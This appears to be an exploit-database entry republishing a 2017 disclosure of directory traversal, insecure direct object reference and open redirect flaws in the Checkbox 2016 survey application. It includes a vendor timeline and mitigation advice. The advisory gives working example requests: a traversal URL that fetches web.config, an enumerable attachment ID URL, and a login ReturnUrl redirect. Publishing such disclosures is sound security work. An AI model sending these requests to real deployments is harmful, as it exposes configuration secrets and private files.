header-logo
Suggest Exploit
vendor:
Checkbox
by:
Fady Mohamed Osman
7.5
CVSS
HIGH
Multiple
22
CWE
Product Name: Checkbox
Affected Version From: Check Box 2016 Q2
Affected Version To: Check Box 2016 Q4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows Server 2012
2017

Check Box 2016 Q2 Survey Multiple Vulnerabilities

Checkbox is a survey application deployed by a number of highly profiled companies and government entities. The vulnerabilities include a directory traversal vulnerability, direct object reference vulnerability, and an open redirection vulnerability. The directory traversal vulnerability allows an attacker to download sensitive files such as the web.config file. The direct object reference vulnerability allows access to attachments without login. The open redirection vulnerability allows an attacker to redirect users to a malicious website.

Mitigation:

The vendor should fix the directory traversal vulnerability by properly validating user input and restricting access to sensitive files. The direct object reference vulnerability should be fixed by implementing proper authentication and authorization checks. The open redirection vulnerability should be fixed by validating and sanitizing user input for redirection URLs.
Source

Exploit-DB raw data:

# Exploit Title: Check Box 2016 Q2 Survey Multiple Vulnerabilities
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r
# Date: Jan 17, 2017
# Vendor Homepage: https://www.checkbox.com/
# Software Link: https://www.checkbox.com/free-checkbox-trial/
# Version: Check Box 2016 Q2,Check Box 2016 Q4  - Fixed in Checkbox Survey,
Inc. v6.7
# Tested on: Check Box 2016 Q2 Trial on windows Server 2012.
# Description : Checkbox is a survey application deployed by a number of
highly profiled companies and government entities like Microsoft, AT&T,
Vodafone, Deloitte, MTV, Virgin, U.S. State Department, U.S. Secret
Service,  U.S. Necular Regulatory Comission, UNAIDS, State Of California
and more!!

For a full list of their clients please visit:
https://www.checkbox.com/clients/

1- Directory traversal vulnerability : For example to download the
web.config file we can send a request as the following:
http://www.example.com/Checkbox/Upload.ashx?f=..\..\web.config&n=web.config

2- Direct Object Reference :
attachments to surveys can be accessed directly without login as the
following:
https://www.victim.com/Checkbox/ViewContent.aspx?contentId=5001
I created a script that can bruteforce the numbers to find ID's that will
download the attachment and you can easily write one on your own ;).

3- Open redirection in login page for example:
https://www.victim.com/Checkbox/Login.aspx?ReturnUrl=http://www.google.com

If you can't see why an open redirection is a problem in login page please
visit the following page:
https://www.asp.net/mvc/overview/security/preventing-
open-redirection-attacks


Timeline:
December 2016 - Discovered the vulnerability during Pen. Test conducted by
ZINAD IT for one of our clients.
Jan 12,2017 - Reported to vendor.
Jan 15,2017 - Sent a kind reminder to the vendor.
Jan 16,2017 - First Vendor Response said they will only consider directory
traversal as a vulnerability and that a fix will be sent in the next day.
Jan 16,2017 - Replied to explain why DOR and Open Redirect is a problem.
Jan 17,2017 - Patch Release Fixed the Directory Traversal.
Jan 17,2017 - Sent another email to confirm if DOR and open redirect wont
be fixed.
Jan 17,2017 - Open redirection confirmed to be fixed in the same patch
released before for DOR the vendor said they didn't believe that's a
security concern and that they have added a warning to let users know that
their attachments will be available to anyone with access to that survey page !!